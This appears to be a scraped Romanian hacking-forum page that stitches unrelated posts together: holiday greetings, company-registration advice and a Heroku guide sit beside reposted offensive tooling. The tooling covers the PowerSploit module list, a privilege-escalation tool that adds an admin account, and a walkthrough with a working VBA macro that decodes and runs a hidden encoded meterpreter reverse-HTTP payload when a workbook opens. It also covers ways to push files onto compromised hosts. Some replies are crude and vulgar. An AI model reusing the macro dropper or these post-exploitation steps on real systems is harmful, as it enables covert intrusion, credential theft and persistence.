Leaderboard

Vreau să urez tuturor utilizatorilor de pe acest forum un paște fericit și multe bucurii și împliniri în continuare! Happy hacking easter ! Vreau să menționez și câteva persoane de pe forum care m-au ajutat mult până acum și promit că o să mă revanșez: @Usr6 @Gecko @aelius @badluck @theandruala @j1ll2013 @MrGrj -- Ganjaa

Multumim! Sfintele Sărbători de Paște să vă aducă, în primul rând, ceea ce nu se poate cumpăra: sănătate, dragoste și prietenie!

Pentru minimizarea taxelor si restul de avantaje iti recomand un S.R.L. Acum, practic cu 300 de ron iti faci S.R.L. daca umblii tu cu actele. La ONRC rezervarea de nume este moca, o faci tu online, tot ceea ce inseamna taxe sunt sub 50 ron, iar cei 200 de ron capital social, pe care trebuie sa ai depui la banca pentru infiintarea societatii ai poti folosi ulterior. Pentru contabilitate, invata tu putin, bazele, apoi colaboreaza cu un contabil, sa iti depuna declaratiile. (pentru depunerea online ai nevoie de semnatura electronica, aia costa vreo 250ron/an). Sigur gasesti un contabil sau o contabila care iti face inchiderile lunare, si tu ai faci mentenenta la computere/birou, gen salvare baze date, actualizare windowsuri, setare router, mentenanta imprimante, incarcare cartus cu toner, setare laptop sa acceseze reteaua interna din parc, instalare ZUMA, SIMS, schimbat becu/priza, sters praful, facut cafea, facut sait la cabinetu de conta, SEO, dat cu mop-ul, etc. Optional, la contabila poti si sa-i dai la buci.Daca mai ai nedumeriri, intreaba punctual ce, si iti raspund.Ca sa faci exercitii/contabilitate, poti descarca si instala SAGA. Este moca, poate fi utilizat foarte usor, ai o tona de documentatie si exemple pe forumul lor.

pentru ca trolli si pentru ca shemale

a Simple tool and not very special but this tool fast and easy create backdoor office exploitation using module metasploit packet. Like Microsoft Office in windows or mac , Open Office in linux , Macro attack , Buffer Overflow in word . Work in kali rolling , Parrot , Backbox . Download: https://github.com/Screetsec/Microsploit

+1 Da in plm Romania cu mizeria si jegul pe care il gasesti la orice colt de strada si pleaca.

FUGI. FUGI TARE DE ACOLO. NU DA NICIUN BAN SARLATANILOR. SFATUL MEU E SA NU DESCHIZI NIMIC SI SA PLECI CAT MAI REPEDE

TempRacer – Windows Privilege Escalation Tool March 29, 2016 TempRacer is a Windows Privilege Escalation Tool written in C# designed to automate the process of injecting user creation commands into batch files with administrator level privileges. The code itself is not using that many resources because it relies on callbacks from the OS. You can keep it running for the the whole day to try and catch the creation of an admin level batch file. It’s especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs you should give it a try. If successful it will inject the code to add the user “alex” with password “Hack123123” and add him to the local administrator group. It will also block the file for further changes, so the privilege escalation code stays inside. You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner You can download tempracer here: – TempRacer.exe – tempracer-1.zip (Source) Or read more here. Sursa: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: CodeExecution Execute code on a target machine. Invoke-DllInjection Injects a Dll into the process ID of your choosing. Invoke-ReflectivePEInjection Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. Invoke-Shellcode Injects shellcode into the process ID of your choosing or within PowerShell locally. Invoke-WmiCommand Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. ScriptModification Modify and/or prepare scripts for execution on a compromised machine. Out-EncodedCommand Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. Out-CompressedDll Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. Out-EncryptedScript Encrypts text files/scripts. Remove-Comments Strips comments and extra whitespace from a script. Persistence Add persistence capabilities to a PowerShell script New-UserPersistenceOption Configure user-level persistence options for the Add-Persistence function. New-ElevatedPersistenceOption Configure elevated persistence options for the Add-Persistence function. Add-Persistence Add persistence capabilities to a script. Install-SSP Installs a security support provider (SSP) dll. Get-SecurityPackages Enumerates all loaded security packages (SSPs). AntivirusBypass AV doesn't stand a chance against PowerShell! Find-AVSignature Locates single Byte AV signatures utilizing the same method as DSplit from "class101". Exfiltration All your data belong to me! Invoke-TokenManipulation Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. Invoke-CredentialInjection Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). Invoke-NinjaCopy Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. Invoke-Mimikatz Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. Get-Keystrokes Logs keys pressed, time and the active window. Get-GPPPassword Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Get-TimedScreenshot A function that takes screenshots at a regular interval and saves them to a folder. New-VolumeShadowCopy Creates a new volume shadow copy. Get-VolumeShadowCopy Lists the device paths of all local volume shadow copies. Mount-VolumeShadowCopy Mounts a volume shadow copy. Remove-VolumeShadowCopy Deletes a volume shadow copy. Get-VaultCredential Displays Windows vault credential objects including cleartext web credentials. Out-Minidump Generates a full-memory minidump of a process. Mayhem Cause general mayhem with PowerShell. Set-MasterBootRecord Proof of concept code that overwrites the master boot record with the message of your choice. Set-CriticalProcess Causes your machine to blue screen upon exiting PowerShell. Privesc Tools to help with escalating privileges on a target. PowerUp Clearing house of common privilege escalation checks, along with some weaponization vectors. Recon Tools to aid in the reconnaissance phase of a penetration test. Invoke-Portscan Does a simple port scan using regular sockets, based (pretty) loosely on nmap. Get-HttpStatus Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. Invoke-ReverseDnsLookup Scans an IP address range for DNS PTR records. PowerView PowerView is series of functions that performs network and Windows domain enumeration and exploitation. Recon\Dictionaries A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources. admin.txt - http://cirt.net/nikto2/ generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/ sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ License The PowerSploit project and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise. Usage Refer to the comment-based help in each individual script for detailed usage information. To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" To use the module, type Import-Module PowerSploit To see the commands imported, type Get-Command -Module PowerSploit If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} } For help on each individual command, Get-Help is your friend. Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. Link: https://github.com/PowerShellMafia/PowerSploit

Embedding Veil Powershell payloads into Office Documents So upon reading Backdoooring Office Documents , I wondered if I could achieve something with one of the Veil-framework Powershell payloads. The end goal being if we had a user on an assessment open and run our macro (which happens more than I would like to admit), we could have a memory resident backdoor that would not get flagged by AV. 1. Veil Payload To start, we would ned to create a Veil (Veil install/documentation) Powershell payload. Upon opening Veil, we’ll just enter: use powershell/VirtualAlloc generate This will start the process for generating our specific Powershell payload. Veil allows for not only msfvenom payloads, but also custom shellcode. Here, we are going to simply use meterpreter/reverse_http. Oh and, in case you were wondering, Veil supports tab completion on the msfvenom payloads! Once the shellcode is generated, we then name our output and take note of its location. Oh and move it to our Office machine 2. Office Macros Now onto embedding the payload into an office document. Open Office, and head to the developer tab, and open the Visual Basic editor: From here, open the payload.bat from Veil in a text editor, and copy the first section (x86) from the word powershell until the end of the first if statement: We will need to create a new Subfunction, “Workbook_Open()”, create two new String objects, “exec” and “str”, and paste this as the string value for “exec” in the VBA pane. Sub Workbook_open() Dim exec As String Dim str As String str = "" exec = "[entire string]" Of course it complains, but this is okay since we will fix this by using string concatenation. Head to the string just after “FromBase64_decrypt” and cut the entire section in between the quotation marks. Insert this string as the “str” value. str="[Value]" The string is still too long! Ok, let’s split it in half and concatenate the string back together one line later: str = "[Value A]" str = str + "[Value B]" Now, we can call the variable “str” in between the the quotation marks: Next, we need to properly escape all the quotations on the line by changing \” to \””. There are occurrences before “Invoke-Express”, and before and after the variable “str”. Finally, we place the entire thing into a Shell(). Our VBA editing is complete. We could continue breaking up the strings and concatenating them back numerous times if need be to make things easy to read or fit into a blog! Below is a copy/paste friendly (read cleaner) template. Also considering how tedious this can be by hand, I wrote a python script, also below, that automates moving this into a vba-friendly output. Template: Sub Workbook_Open() Dim exec As String Dim str As String str = "[half payload value]" str = str + "[half payload value]" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command" exec = exec + " ""Invoke-Expression $(New-Object IO.StreamReader " exec = exec + "($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]" exec = exec + "::FromBase64String(\"" " & payload & " \""))))," exec = exec + "[IO.Compression.CompressionMode]::Decompress))," exec = exec + "[Text.Encoding]::ASCII)).ReadToEnd();"" " Shell(exec) Macro_safe.py: (google drive download here) (new github link here, part of the MacroShop repository) #!/usr/bin/python ##### # macro_safe.py ##### # # Takes Veil powershell batch file and outputs into a text document # macro safe text for straight copy/paste. # import os, sys import re def formStr(varstr, instr): holder = [] str1 = '' str2 = '' str1 = varstr + ' = "' + instr[:54] + '"' for i in xrange(54, len(instr), 48): holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48]) str2 = '"\r\n'.join(holder) str2 = str2 + "\"" str1 = str1 + "\r\n"+str2 return str1 if len(sys.argv) < 2: print "----------------------\n" print " Macro Safe\n" print "----------------------\n" print "\n" print "Takes Veil batch output and turns into macro safe text\n" print "\n" print "USAGE: " + sys.argv[0] + " <input batch> <output text>\n" print "\n" else: fname = sys.argv[1] f = open(fname) lines = f.readlines() f.close() cut = [] for line in lines: #split on else to truncate the back half first = line.split('else') # split on \" cut = first[0].split('\\"', 4) #get rid of everything before powershell cut[0] = cut[0].split('%==x86')[1] cut[0] = cut[0][2:] #get rid of trailing parenthesis cut[2] = cut[2].strip(" ") cut[2] = cut[2][:-1] # for i in range(0,3): # print str(i) + " " +cut top = "Sub Workbook_Open()\r\n" top = top + "Dim str As String\r\n" top = top + "Dim exec As String\r\n" #insert '\r\n' and 'str = str +' every 48 chars after the first 54. payL = formStr("str", str(cut[1])) #double up double quotes, add the rest of the exec string idx = cut[0].index('"') cut[0] = cut[0][:idx] + '"' + cut[0][idx:] cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] +"\"" #insert 'exec = exec +' and '\r\n' every 48 after the first 54. execStr = formStr("exec", str(cut[0])) shell = "Shell(exec)" bottom = "End Sub\r\n\r\n\'---Generated by macro_safe.py by khr040sh---" final = '' final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n" print final try: f = open(sys.argv[2],'w') f.write(final) # python will convert \n to os.linesep f.close() except: print "Error writing file.\n Please check permissions and try again.\nExiting..." sys.exit(1) print "File written to " + sys.argv[2] + " !" Sample output from python code: Sub Workbook_Open() Dim str As String Dim exec As String str = "nVZNj+M2DL3nVwiBDwkmnsrf9gQD7LSLBRYoigIzaA9BsJBleWKsYw" str = str + "e2vJuZtv+94kvo6XYvRS+0RVHk4yNNy9PiXrxbLnbv2/bj8d" str = str + "QPdrX8bIbOtFF4W7Xtcr0Xp6lsGy1Gq6x7mLN1++JjZ3+1g/" str = str + "itGeyk2oe27fXqqvu6EVPTWXG+Pl+uz9f19n/H+Wkwypqng3" str = str + "tUHGe6+v2yEW+Rr2//iH3V/Dv6cfyiB/tfYh/NcTR29b3nOa" str = str + "vlu4XXOyIfqsp/ejkZ4bszpRnem7rpGtv0nfC08H9RRyOWvz" str = str + "ddFC6F37nVeFLaCGg+TJ0my1H4JzWO9jBMC+987/V3d9+QLD" str = str + "fyHEhJj+jyiOV6K3Y/vliz2++9kSrai4dBH8RoWqOtqTbXt6" str = str + "Z7xsadOOepqIf+KOzBiJN6aXtVLT70U1eJMBS6P54cEWVrhO" str = str + "l0X5lhXDxYa44nuLD9Vc0nxdfGHkQgGkebuiTR1xTjh/HQfF" str = str + "ZWfXpWnzrVLL5XiXHS2pjKXJ2MzasRUZKK1ezsXq4XUzc2z5" str = str + "0z0gc1iHKqd3uXpku+Kp3QtROlcqJOnUhCIod0YU4mhRNZTE" str = str + "sSNYnE0JI2NIkyIF3kRE5CkxdJdhE2aBnQUka8NBSjJPo1xa" str = str + "3iWUcmUULuSdQhgyw1GeNExHGxkVOMjERFqBRh1uQvI5MCXi" str = str + "oS5EAqPgb0cF+WjEqSSUTGEb0lGTmgkAW5r8l9TcdS2jUgJ2" str = str + "SGYjoWErSQjgWAVjBXmnQx7EJmIyNoGe0a2k3JXwy4CaPKkD" str = str + "R5NgRcGtYhGVAiEw6J9FE3kIN6IIUk57MJqkpvFe0aVLXkCo" str = str + "J2COzmciZRMYKw4mZAtcI5yzRjmuKMjQMSiuyKiHdRQcCVKT" str = str + "dIHjLPcAoTeInJJEXN0XCaa3RJYe4XjbhABQ5yzi1XDC1T3D" str = str + "lydlWRXQqkFCinZV4z3DjnVFPSRWgQIAUq2ohrrip6A1UFf8" str = str + "gNOpCow9kzBk/BxAJpKLnIipCW9Uwi+SsKjoZlEjPjlyLDC8" str = str + "ENcBb+Yj5R5Ex7nnBcSYGCgikxtCznBkZzBWgGxcdQhRhfcs" str = str + "j8oc2Q4BsRqPnFhIzxdYNYUJKQMCAWb7RRGm4pREOfXqYKTA" str = str + "CS7IqQT+DDBr6czsp8Ro8CaE4LcdFmmC8JnSjQNIQU0wKAYn" str = str + "z7ilFV5CDFeFBMLGbEBXjM6SsIpEXGKp53aRmTFwwekIMeyu" str = str + "a5VmGWKE4fmZuEdZiEeMsrfkOX1CXXCGy86VDQlHRoZfRuRf" str = str + "4whpFvnnLN8WEDCwZUmXDJCoqrS+bqApyWmPcKHZFxtQpMH8" str = str + "y6gOuGZEAnug7DqMYwwgCtGFER4zkMuciYjphNaDOFWQcEGS" str = str + "Mo35gkHeZGmnD18fMKIkYA6pARSnspPNmZfLuo+0GsvOZebr" str = str + "1G+O4fvXI//dufTfdsD36wdtqbm7X4g24O16vL7nJ32a+88+" str = str + "1T7xZRuFrfeM16I9zRndfsNyJYiz9FP1m/m9p2+9fCe8Xd56" str = str + "uLlyNi45039KA7x6NVg/UfW2NOwn80une3B7qaSPk3" exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe" exec = exec + "ader ($(New-Object IO.Compression.DeflateStream " exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro" exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp" exec = exec + "ression.CompressionMode]::Decompress)), [Text.En" exec = exec + "coding]::ASCII)).ReadToEnd();""" Shell(exec) End Sub '---Generated by macro_safe.py by khr040sh--- [EDITED: UPDATED python link] Sursa: https://khr0x40sh.wordpress.com/2014/06/02/embedding-veil-powershell-payloads-into-office-documents/

In caz ca scrieti python (sau php, nodejs, etc) si vreti sa aveti un enviroment de 'test' unde sa deployati aplicatia, puteti folosi cu incredere heroku (Cloud Application Platform) Eu folosesc heroku pentru deploy-ul aplicatiilor Django si ceea ce-mi place, e faptul ca nu trebuie sa-mi bat capul cu configurari multe pentru un enviroment de test (configurari de genu' asta). Asa ca, aici un mini tutorial introductiv despre deploy-ul aplicatiei pe heroku: 1. Instalati Heroku Toolbelt (venv)~/p/s/project git:develop ??? wget -O- https://toolbelt.heroku.com/install-ubuntu.sh | sh 2. Va logati cu credential-urile de pe heroku (venv)~/p/s/project git:develop ??? heroku login O sa vi se ceara username/password. 3. Presupunand ca sunteti in directorul cu aplicatia: Creati un fisier Procfile care o sa ruleze wsgi-ul pentru app (wsgi pentru ca vorbesc de python acum) Ceva de genu: web: gunicorn projectdjango.wsgi --log-file - S-aveti grija sa puneti in requirements.txt gunicorn-ul in cazul de fata. In momentul deploy-ului Dyno-ul de la Heroku o sa se uite-n requirements.txt si o sa instaleze automat toate dependintele. 4. Creem un repo remote la heroku Initializam repo (in cazul in care nu aveti deja unul ce-l folositi pe bitbucket/github) git init Facem un repository remote in care o sa pushuiti codul heroku create 5. Deploy-ul efectiv: git push heroku master In linii mari, ceea ce se intampla consta in faptul ca serverului vostru de pe heroku i se asociaza un repo; in momentul in care voi faceti push in repo-ul remote, dyno-ul de la heroku va sti sa faca pull + install requirements + restart gunicorn. Daca aveti nelamuriri, o sa incerc sa raspund.

Why not, pascal rullz

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files. There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will covered in this blog. PowerShell file download Visual Basic file download Perl file download Python file download Ruby file download PHP file download or upload FTP file download TFTP file download Bitsadmin file download Wget file download Netcat file download Windows share file download Notepad dialog box file download Exe to Text, Text to EXE with PowerShell and Nishang Csc.exe to compile from source file Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file. PowerShell File Download PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet: $p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:\%homepath%\file") To execute this script, run the following command in a PowerShell window: PS C:\> .\test.ps1 Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command: C:\>powershell set-executionpolicy unrestricted Visual Basic File Download The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one. Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' end with Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above. To execute this script, run the following command in a command shell: C:\>cscript test.vbs The following four languages are non-native to windows machines. However, if you find a machine with any of these languages installed on them (regardless of the OS), you can leverage these scripts to download files. Perl File Download Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host. #!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file"); To execute this script, run the following command in a command shell: root@kali:~# perl test.pl Python File Download Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task. #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close() To execute this script, run the following command in a command shell: root@kali:~# python test.py Ruby File Download Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files. #!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } } To execute this script, run the following command in a command shell: root@kali:~# ruby test.rb PHP File Download PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language. #!/usr/bin/php <?php $data = @file("http://example.com/file"); $lf = "local_file"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh); ?> To execute this script, run the following command in a command shell: root@kali:~# php test.php The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions. FTP File Download For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps ran without the need for interaction. ftp 127.0.0.1 username password get file exit TFTP File Download Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command: tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server Bitsadmin File Download Bitsadmin is a command-line tool for windows that allows a user to create download or upload tasks. bitsadmin /transfer n http://domain/file c:\%homepath%\file Wget File Download Wget is a Linux and Windows tool that allows for non-interactive downloads. wget http://example.com/file Netcat File Download Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific. On the attackers computer, type: cat file | nc -l 1234 This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP. The following command should be run on the machine the attacker is targeting: nc host_ip 1234 > file This will connect the target to the attacker's computer and receive the file that will be sent over the connection. Windows Share File Download Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands. To mount a remote drive, type: net use x: \\127.0.0.1\share /user:example.com\userID myPassword Notepad Dialog Box File Download If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal. Open notepad Go to file - open In the File Name box near the bottom, type in the full URL path to your file Notepad is kind enough to go out and grab the contents of this file for you. Exe to Txt, and Txt to Exe with PowerShell and Nishang This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here. To convert the exe to a hex file, type: PS > .\ExetoText.ps1 evil.exe evil.txt Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang. To convert the hex file back to an exe, type: PS > .\TexttoExe.ps1 evil.text evil.exe This will result in your evil exe being successfully moved to the target machine. Csc.exe to Compile Source from a File C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity. The default location for this executable is the following: C:\Windows\Microsoft.NET\Framework\version Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code. public class Evil { public static void Main() { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "cmd.exe"; startInfo.Arguments = "/C net users > C:\\Temp\\users.txt"; process.StartInfo = startInfo; process.Start(); } } To compile your source code, type: csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs Wrap up Hopefully this blog has given you viable options for getting your files (malicious or otherwise) over to a server. Sursa: https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file

Nu e adevarat. https://www.facebook.com/careers/search/?q=&defined=http('meth:post'/data='q=/xss:protection')&location=null Fals. -1